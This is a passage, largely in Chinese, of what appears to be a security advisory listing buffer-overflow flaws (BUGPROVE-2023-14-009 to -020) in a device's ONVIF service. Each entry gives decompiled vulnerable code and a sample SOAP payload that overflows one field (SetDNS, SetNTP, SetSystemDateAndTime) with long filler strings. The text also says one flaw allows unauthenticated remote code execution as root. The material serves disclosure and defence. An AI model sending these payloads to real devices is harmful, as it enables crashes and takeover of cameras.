  char acStack408 [256];
  char acStack152 [64];
  char acStack88 [32];
  char acStack56 [8];
  undefined4 local_30;
  undefined4 local_2c;

  memset(acStack408,0,0x100);
  memset(&cStack664,0,0x100);
  memcpy(acStack56,PTR_s_http://_0000b58c,8);
  local_30 = 0;
  local_2c = 0;
  memset(acStack88,0,0x20);
  memset(acStack152,0,0x40);
  body_pointer = strstr(input,PTR_DAT_0000b590);
  if (body_pointer == (char *)0x0) {
    return;
  }
  body_pointer = strchr(body_pointer,0x3c);
  pcVar1 = strchr(body_pointer,0x3e);
  sVar6 = (int)pcVar1 - (int)body_pointer;
  strncpy(&cStack664,body_pointer,sVar6);
  pcVar1 = strstr(&cStack664,PTR_s_http://_0000b58c);
  if (pcVar1 == (char *)0x0) {
    pcVar1 = strchr(&cStack664,0x3a);
    if (pcVar1 == (char *)0x0) {
      strncpy(endpoint,acStack663,sVar6);
      strcpy(param_2,PTR_s_http://www.onvif.org/ver20/ptz/w_0000b594);
      return;
    }
    strncpy(acStack88,acStack663,(int)pcVar1 - (int)acStack663);
    sprintf(acStack152,"xmlns:%s=\"",acStack88);
    sVar5 = strlen(acStack152);
    pcVar1 = strstr(input,acStack152);
    pcVar1 = pcVar1 + (sVar5 & 0xff);
    pcVar2 = strchr(pcVar1,0x22);
    pcVar3 = strchr(&cStack664,0x3a);
    pcVar3 = pcVar3 + 1;
    pcVar4 = strchr(pcVar3,0x2f);
    if ((pcVar4 != (char *)0x0) || (pcVar4 = strchr(pcVar3,0x3e), pcVar4 != (char *)0x0))
    goto LAB_0000b4cc;
    strncpy(&cStack664,body_pointer,sVar6 + 1);
    pcVar3 = strchr(&cStack664,0x3a);
    pcVar3 = pcVar3 + 1;
    __c = 0x3e;
  }

以下有效负载演示了此问题

<s:Body xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"><GetScopes xmlns=\"http://AAAAAAAA.......
/></s:Body>

这使得未经身份验证的远程攻击者能够破坏 Onvif 服务,并在根用户的上下文中在设备上运行任意代码。

一系列身份验证后漏洞

所报告的其他问题都是由于上述在BUGPROVE-2023-14-002中讨论的不安全的XML元素查找所致,然而,与安全相关的漏洞点(例如实际的缓冲区溢出点)位于只有经过身份验证的用户才能访问的二进制文件中。

BUGPROVE-2023-14-009

存在漏洞的代码如下:

iVar1 = strcmp(param_3,"SetDNS");
if (iVar1 == 0) {
  memset(dnsmanual,0,0x200);
  memset(acStack440,0,0x40);
  memset(fromdhcp,0,0x40);
  memset(local_b0,0,0x40);
  memset(domain,0,0x100);
  lookup_field_xml(document,&DAT_000332f4,fromdhcp);
  iVar6 = lookup_field_xml(document,"DNSManual",dnsmanual);
  iVar1 = lookup_field_xml(document,"SearchDomain",domain);
  if (iVar1 != 0) {
    memset((char *)(param_4 + 0x597),0,0x100);
    strcpy((char *)(param_4 + 0x597),domain);
  }

示例负载如下:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>admin</Username>
                <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">OQVQa48ZhUh04oiQkPeU514MpSU=</Password>
                <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l3YAAAAAAA==</Nonce>
                <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-15T08:28:59.557Z</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <SetDNS xmlns="http://www.onvif.org/ver10/device/wsdl">
            <FromDHCP>AAAAAAAAAAAAA...........</FromDHCP>
            <DNSManual>
                <Type xmlns="http://www.onvif.org/ver10/schema">IPv4</Type>
                <IPv4Address xmlns="http://www.onvif.org/ver10/schema">192.168.1.254</IPv4Address>
            </DNSManual>
            <DNSManual>
                <Type xmlns="http://www.onvif.org/ver10/schema">IPv4</Type>
                <IPv4Address xmlns="http://www.onvif.org/ver10/schema">8.8.8.8</IPv4Address>
            </DNSManual>
        </SetDNS>
    </s:Body>
</s:Envelope>

BUGPROVE-2023-14-010

存在漏洞的代码如下:

 iVar1 = strcmp(param_3,"SetDNS");
    if (iVar1 == 0) {
      memset(dnsmanual,0,0x200);
      memset(acStack440,0,0x40);
      memset(fromdhcp,0,0x40);
      memset(local_b0,0,0x40);
      memset(domain,0,0x100);
      lookup_field_xml(document,&DAT_000332f4,fromdhcp);
      iVar6 = lookup_field_xml(document,"DNSManual",dnsmanual);
      iVar1 = lookup_field_xml(document,"SearchDomain",domain);
      if (iVar1 != 0) {
        memset((char *)(param_4 + 0x597),0,0x100);
        strcpy((char *)(param_4 + 0x597),domain);
      }

示例负载如下:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>admin</Username>
                <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">OQVQa48ZhUh04oiQkPeU514MpSU=</Password>
                <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l3YAAAAAAA==</Nonce>
                <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-15T08:28:59.557Z</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <SetDNS xmlns="http://www.onvif.org/ver10/device/wsdl">
            <SearchDomain>AAAAAAAAAAAAA.........</SearchDomain>
            <DNSManual>
                <Type xmlns="http://www.onvif.org/ver10/schema">IPv4</Type>
                <IPv4Address xmlns="http://www.onvif.org/ver10/schema">192.168.1.254</IPv4Address>
            </DNSManual>
            <DNSManual>
                <Type xmlns="http://www.onvif.org/ver10/schema">IPv4</Type>
                <IPv4Address xmlns="http://www.onvif.org/ver10/schema">8.8.8.8</IPv4Address>
            </DNSManual>
        </SetDNS>
    </s:Body>
</s:Envelope>

BUGPROVE-2023-14-011

存在漏洞的代码如下:

  iVar3 = 0;
        *(undefined *)(param_4 + 0x12b7) = 0;
        *(undefined *)(param_4 + 0x1235) = 0;
        local_4558 = document;
        do {
          memset(dnsmanual,0,0x200);
          memset(local_b0,0,0x40);
          memset(acStack440,0,0x40);
          local_4558 = (char *)get_xml_element(local_4558,dnsmanual,"DNSManual");
          if (iVar6 == 0) goto LAB_00016370;
          lookup_field_xml(dnsmanual,"Type",acStack440);
          iVar1 = lookup_field_xml(dnsmanual,"Type",acStack440);
          if ((iVar1 != 0) && (iVar1 = strcmp(acStack440,"IPv4"), iVar1 == 0)) {
            lookup_field_xml(dnsmanual,"IPv4Address",local_b0);
            iVar1 = FUN_0001bf0c(local_b0);
            if (iVar1 == 0) goto LAB_00016384;
            if (local_b0[0] != '\0') {
              pcVar4 = (char *)(param_4 + 0x12b8);
              if (iVar3 != 0) {
                pcVar4 = (char *)(param_4 + 0x12d8);
              }
              strcpy(pcVar4,local_b0);
            }
          }

示例负载如下:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>admin</Username>
                <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">OQVQa48ZhUh04oiQkPeU514MpSU=</Password>
                <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l3YAAAAAAA==</Nonce>
                <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-15T08:28:59.557Z</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <SetDNS xmlns="http://www.onvif.org/ver10/device/wsdl">
            <DNSManual>
                <Type xmlns="http://www.onvif.org/ver10/schema">IPv4</Type>
                <IPv4Address xmlns="http://www.onvif.org/ver10/schema"></IPv4Address>
            </DNSManual>
            <DNSManual>
                <Type xmlns="http://www.onvif.org/ver10/schema">IPv4</Type>
                <IPv4Address xmlns="http://www.onvif.org/ver10/schema">AAAAAAAAAAAAAAAA........</IPv4Address>
            </DNSManual>
        </SetDNS>
    </s:Body>
</s:Envelope>

BUGPROVE-2023-14-012

存在漏洞的代码如下:

    iVar3 = 0;
    *(undefined *)(param_4 + 0x12b7) = 0;
    *(undefined *)(param_4 + 0x1235) = 0;
    local_4558 = document;
    do {
      memset(dnsmanual,0,0x200);
      memset(local_b0,0,0x40);
      memset(acStack440,0,0x40);
      local_4558 = (char *)get_xml_element(local_4558,dnsmanual,"DNSManual");
      if (iVar6 == 0) goto LAB_00016370;
      lookup_field_xml(dnsmanual,"Type",acStack440);
      iVar1 = lookup_field_xml(dnsmanual,"Type",acStack440);
      if ((iVar1 != 0) && (iVar1 = strcmp(acStack440,"IPv4"), iVar1 == 0)) {
        lookup_field_xml(dnsmanual,"IPv4Address",local_b0);
        iVar1 = FUN_0001bf0c(local_b0);
        if (iVar1 == 0) goto LAB_00016384;
        if (local_b0[0] != '\0') {
          pcVar4 = (char *)(param_4 + 0x12b8);
          if (iVar3 != 0) {
            pcVar4 = (char *)(param_4 + 0x12d8);
          }
          strcpy(pcVar4,local_b0);
        }
      }

示例负载如下:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>admin</Username>
                <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">OQVQa48ZhUh04oiQkPeU514MpSU=</Password>
                <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l3YAAAAAAA==</Nonce>
                <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-15T08:28:59.557Z</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <SetDNS xmlns="http://www.onvif.org/ver10/device/wsdl">
            <DNSManual>
                <Type xmlns="http://www.onvif.org/ver10/schema">IPv4</Type>
                <IPv4Address xmlns="http://www.onvif.org/ver10/schema"></IPv4Address>
            </DNSManual>
            <DNSManual>
                <Type xmlns="http://www.onvif.org/ver10/schema">AAAAAAAAAAAAA...</Type>
                <IPv4Address xmlns="http://www.onvif.org/ver10/schema">8.8.8.8</IPv4Address>
            </DNSManual>
        </SetDNS>
    </s:Body>
</s:Envelope>

BUGPROVE-2023-14-013

存在漏洞的代码如下:

void set_ntp(char *param_1,int param_2,undefined4 param_3)

{
  int iVar1;
  char acStack2592 [1024];
  undefined auStack1568 [512];
  undefined auStack1056 [512];
  char acStack544 [128];
  char acStack416 [128];
  undefined auStack288 [128];
  char local_a0 [128];

  memset(acStack2592,0,0x400);
  memset(local_a0,0,0x80);
  memset(auStack288,0,0x80);
  memset(auStack1056,0,0x200);
  memset(auStack1568,0,0x200);
  memset(acStack416,0,0x80);
  memset(acStack544,0,0x80);
  lookup_field_xml(param_3,&from,acStack544);
  get_xml_element(param_3,auStack1056,"NTPManual");
  get_xml_element(param_3,auStack1568);
  iVar1 = strcmp(acStack544,"true");
  *(bool *)(param_2 + 0x1379) = iVar1 == 0;
  iVar1 = lookup_field_xml(auStack1056,"Type",acStack416);
  if (iVar1 == 0) {
    iVar1 = lookup_field_xml(auStack1568,"Type",acStack416);
    if (iVar1 == 0) goto LAB_000145ec;
    iVar1 = strcmp(acStack416,"IPv4");
  }
  else {
    iVar1 = strcmp(acStack416,"IPv4");
  }
  if (iVar1 == 0) {
    lookup_field_xml(auStack1056,"IPv4Address",local_a0);
    lookup_field_xml(auStack1056,"DNSname",auStack288);

示例负载如下:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>admin</Username>
                <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">60/Axdm/co8WyRAmw4oP99W+FBg=</Password>
                <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l3UBAAAAAA==</Nonce>
                <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-20T05:12:01.109Z</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <SetNTP xmlns="http://www.onvif.org/ver10/device/wsdl">
            <FromDHCP>false</FromDHCP>
            <NTPManual>
                <Type xmlns="http://www.onvif.org/ver10/schema">IPv4</Type>
                <IPv4Address xmlns="http://www.onvif.org/ver10/schema">AAAAA...</IPv4Address>
            </NTPManual>
        </SetNTP>
    </s:Body>
</s:Envelope>

BUGPROVE-2023-14-014

存在漏洞的代码如下:

void set_ntp(char *param_1,int param_2,undefined4 param_3)

{
  int iVar1;
  char acStack2592 [1024];
  undefined auStack1568 [512];
  undefined auStack1056 [512];
  char acStack544 [128];
  char acStack416 [128];
  undefined auStack288 [128];
  char local_a0 [128];

  memset(acStack2592,0,0x400);
  memset(local_a0,0,0x80);
  memset(auStack288,0,0x80);
  memset(auStack1056,0,0x200);
  memset(auStack1568,0,0x200);
  memset(acStack416,0,0x80);
  memset(acStack544,0,0x80);
  lookup_field_xml(param_3,&from,acStack544);
  get_xml_element(param_3,auStack1056,"NTPManual");
  get_xml_element(param_3,auStack1568);
  iVar1 = strcmp(acStack544,"true");
  *(bool *)(param_2 + 0x1379) = iVar1 == 0;
  iVar1 = lookup_field_xml(auStack1056,"Type",acStack416);
  if (iVar1 == 0) {
    iVar1 = lookup_field_xml(auStack1568,"Type",acStack416);
    if (iVar1 == 0) goto LAB_000145ec;
    iVar1 = strcmp(acStack416,"IPv4");
  }
  else {
    iVar1 = strcmp(acStack416,"IPv4");
  }
  if (iVar1 == 0) {
    lookup_field_xml(auStack1056,"IPv4Address",local_a0);
    lookup_field_xml(auStack1056,"DNSname",auStack288);

示例负载如下:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>admin</Username>
                <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">60/Axdm/co8WyRAmw4oP99W+FBg=</Password>
                <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l3UBAAAAAA==</Nonce>
                <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-20T05:12:01.109Z</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <SetNTP xmlns="http://www.onvif.org/ver10/device/wsdl">
            <FromDHCP>false</FromDHCP>
            <NTPManual>AAAAAAAAA...</NTPManual>
        </SetNTP>
    </s:Body>
</s:Envelope>

BUGPROVE-2023-14-015

存在漏洞的代码如下:

void set_ntp(char *param_1,int param_2,undefined4 param_3)

{
  int iVar1;
  char acStack2592 [1024];
  undefined auStack1568 [512];
  undefined auStack1056 [512];
  char acStack544 [128];
  char acStack416 [128];
  undefined auStack288 [128];
  char local_a0 [128];

  memset(acStack2592,0,0x400);
  memset(local_a0,0,0x80);
  memset(auStack288,0,0x80);
  memset(auStack1056,0,0x200);
  memset(auStack1568,0,0x200);
  memset(acStack416,0,0x80);
  memset(acStack544,0,0x80);
  lookup_field_xml(param_3,&fromdhcp,acStack544);
  get_xml_element(param_3,auStack1056,"NTPManual");
  get_xml_element(param_3,auStack1568);
  iVar1 = strcmp(acStack544,"true");
  *(bool *)(param_2 + 0x1379) = iVar1 == 0;
  iVar1 = lookup_field_xml(auStack1056,"Type",acStack416);
  if (iVar1 == 0) {
    iVar1 = lookup_field_xml(auStack1568,"Type",acStack416);
    if (iVar1 == 0) goto LAB_000145ec;
    iVar1 = strcmp(acStack416,"IPv4");
  }
  else {
    iVar1 = strcmp(acStack416,"IPv4");
  }
  if (iVar1 == 0) {
    lookup_field_xml(auStack1056,"IPv4Address",local_a0);
    lookup_field_xml(auStack1056,"DNSname",auStack288);

示例负载如下:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>admin</Username>
                <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">60/Axdm/co8WyRAmw4oP99W+FBg=</Password>
                <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l3UBAAAAAA==</Nonce>
                <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-20T05:12:01.109Z</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <SetNTP xmlns="http://www.onvif.org/ver10/device/wsdl">
            <FromDHCP>AAAAAA.....</FromDHCP>
            <NTPManual></NTPManual>
        </SetNTP>
    </s:Body>
</s:Envelope>

BUGPROVE-2023-14-016

存在漏洞的代码如下:

void set_ntp(char *param_1,int param_2,undefined4 param_3)

{
  int iVar1;
  char acStack2592 [1024];
  undefined auStack1568 [512];
  undefined auStack1056 [512];
  char acStack544 [128];
  char acStack416 [128];
  undefined auStack288 [128];
  char local_a0 [128];

  memset(acStack2592,0,0x400);
  memset(local_a0,0,0x80);
  memset(auStack288,0,0x80);
  memset(auStack1056,0,0x200);
  memset(auStack1568,0,0x200);
  memset(acStack416,0,0x80);
  memset(acStack544,0,0x80);
  lookup_field_xml(param_3,&from,acStack544);
  get_xml_element(param_3,auStack1056,"NTPManual");
  get_xml_element(param_3,auStack1568);
  iVar1 = strcmp(acStack544,"true");
  *(bool *)(param_2 + 0x1379) = iVar1 == 0;
  iVar1 = lookup_field_xml(auStack1056,"Type",acStack416);
  if (iVar1 == 0) {
    iVar1 = lookup_field_xml(auStack1568,"Type",acStack416);
    if (iVar1 == 0) goto LAB_000145ec;
    iVar1 = strcmp(acStack416,"IPv4");
  }
  else {
    iVar1 = strcmp(acStack416,"IPv4");
  }
  if (iVar1 == 0) {
    lookup_field_xml(auStack1056,"IPv4Address",local_a0);
    lookup_field_xml(auStack1056,"DNSname",auStack288);

示例负载如下:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>admin</Username>
                <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">60/Axdm/co8WyRAmw4oP99W+FBg=</Password>
                <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l3UBAAAAAA==</Nonce>
                <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-20T05:12:01.109Z</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <SetNTP xmlns="http://www.onvif.org/ver10/device/wsdl">
            <FromDHCP>false</FromDHCP>
            <NTPManual>
                <Type xmlns="http://www.onvif.org/ver10/schema">"AAAAAAA</Type>
                <IPv4Address xmlns="http://www.onvif.org/ver10/schema"></IPv4Address>
            </NTPManual>
        </SetNTP>
    </s:Body>
</s:Envelope>

BUGPROVE-2023-14-017

存在漏洞的代码如下:

void set_ntp(char *param_1,int param_2,undefined4 param_3)

{
  int iVar1;
  char acStack2592 [1024];
  undefined auStack1568 [512];
  undefined auStack1056 [512];
  char acStack544 [128];
  char acStack416 [128];
  undefined auStack288 [128];
  char local_a0 [128];

  memset(acStack2592,0,0x400);
  memset(local_a0,0,0x80);
  memset(auStack288,0,0x80);
  memset(auStack1056,0,0x200);
  memset(auStack1568,0,0x200);
  memset(acStack416,0,0x80);
  memset(acStack544,0,0x80);
  lookup_field_xml(param_3,&from,acStack544);
  get_xml_element(param_3,auStack1056,"NTPManual");
  get_xml_element(param_3,auStack1568);
  iVar1 = strcmp(acStack544,"true");
  *(bool *)(param_2 + 0x1379) = iVar1 == 0;
  iVar1 = lookup_field_xml(auStack1056,"Type",acStack416);
  if (iVar1 == 0) {
    iVar1 = lookup_field_xml(auStack1568,"Type",acStack416);
    if (iVar1 == 0) goto LAB_000145ec;
    iVar1 = strcmp(acStack416,"IPv4");
  }
  else {
    iVar1 = strcmp(acStack416,"IPv4");
  }
  if (iVar1 == 0) {
    lookup_field_xml(auStack1056,"IPv4Address",local_a0);
    lookup_field_xml(auStack1056,"DNSname",auStack288);

示例负载如下:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>admin</Username>
                <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">60/Axdm/co8WyRAmw4oP99W+FBg=</Password>
                <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l3UBAAAAAA==</Nonce>
                <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-20T05:12:01.109Z</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <SetNTP xmlns="http://www.onvif.org/ver10/device/wsdl">
            <FromDHCP>false</FromDHCP>
            <NTPManual>
                <Type xmlns="http://www.onvif.org/ver10/schema">IPv4</Type>
                <DNSname xmlns="http://www.onvif.org/ver10/schema">AAAAAAAAAAAAAAAAA..............</DNSname>
            </NTPManual>
        </SetNTP>
    </s:Body>
</s:Envelope>

BUGPROVE-2023-14-018

存在漏洞的代码如下:

else {
              iVar1 = strcmp(param_3,"SetSystemDateAndTime");
              if (iVar1 == 0) {
                memset(local_b0,0,0x81);
                iVar1 = lookup_field_xml(document,"DateTimeType",local_b0);
                if (iVar1 == 0) goto LAB_000171f0;
                memset(fromdhcp,0,0x81);
                memset(acStack440,0,0x81);
                memset(auStack572,0,0x81);
                memset(auStack704,0,0x81);
                memset(auStack836,0,0x81);
                memset(auStack968,0,0x81);
                memset(auStack1100,0,0x81);
                memset(dnsmanual,0,0x81);
                memset(domain,0,0x81);
                lookup_field_xml(document,"DaylightSavings",fromdhcp);
                lookup_field_xml(document,"UTCDateTime",acStack440);
                lookup_field_xml(document,"TZ",auStack572);
                lookup_field_xml(document,&DAT_00034140,auStack704);
                lookup_field_xml(document,"Minute",auStack836);
                lookup_field_xml(document,"Second",auStack968);
                lookup_field_xml(document,&DAT_00034153,auStack1100);
                lookup_field_xml(document,"Month",dnsmanual);
                lookup_field_xml(document,&DAT_0003415e,domain);
                iVar1 = FUN_00014f38(acStack9548,local_b0,fromdhcp,auStack572,auStack1100,dnsmanual,
                                     domain,auStack704,auStack836,auStack968,param_4);
              }

示例负载如下:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>admin</Username>
                <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">t9z8Eni3FtbMprKNewcUu3tRnvQ=</Password>
                <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l8ABAAAAAA==</Nonce>
                <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-21T00:57:56.462Z</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <SetSystemDateAndTime xmlns="http://www.onvif.org/ver10/device/wsdl">
            <DateTimeType>AAAAAAAAAAAAAAAAAAAAA......</DateTimeType>
            <DaylightSavings>false</DaylightSavings>
            <TimeZone>
                <TZ xmlns="http://www.onvif.org/ver10/schema">PST8PDT,M3.2.0,M11.1.0</TZ>
            </TimeZone>
            <UTCDateTime>
                <Time xmlns="http://www.onvif.org/ver10/schema">
                    <Hour>21</Hour>
                    <Minute>29</Minute>
                    <Second>55</Second>
                </Time>
                <Date xmlns="http://www.onvif.org/ver10/schema">
                    <Year>2023</Year>
                    <Month>3</Month>
                    <Day>7</Day>
                </Date>
            </UTCDateTime>
        </SetSystemDateAndTime>
    </s:Body>
</s:Envelope>

BUGPROVE-2023-14-019

存在漏洞的代码如下:

参考BUGPROVE-2023-14-018.

示例负载如下:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>admin</Username>
                <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">t9z8Eni3FtbMprKNewcUu3tRnvQ=</Password>
                <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l8ABAAAAAA==</Nonce>
                <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-21T00:57:56.462Z</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <SetSystemDateAndTime xmlns="http://www.onvif.org/ver10/device/wsdl">
            <DateTimeType>Manual</DateTimeType>
            <DaylightSavings>AAAAAAAAAAAAAAAAAAAAAAAA.........</DaylightSavings>
            <TimeZone>
                <TZ xmlns="http://www.onvif.org/ver10/schema">PST8PDT,M3.2.0,M11.1.0</TZ>
            </TimeZone>
            <UTCDateTime>
                <Time xmlns="http://www.onvif.org/ver10/schema">
                    <Hour>21</Hour>
                    <Minute>29</Minute>
                    <Second>55</Second>
                </Time>
                <Date xmlns="http://www.onvif.org/ver10/schema">
                    <Year>2023</Year>
                    <Month>3</Month>
                    <Day>7</Day>
                </Date>
            </UTCDateTime>
        </SetSystemDateAndTime>
    </s:Body>
</s:Envelope>

BUGPROVE-2023-14-020

存在漏洞的代码如下:

参考BUGPROVE-2023-14-018.

示例负载如下:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>admin</Username>
                <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">t9z8Eni3FtbMprKNewcUu3tRnvQ=</Password>
                <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l8ABAAAAAA==</Nonce>
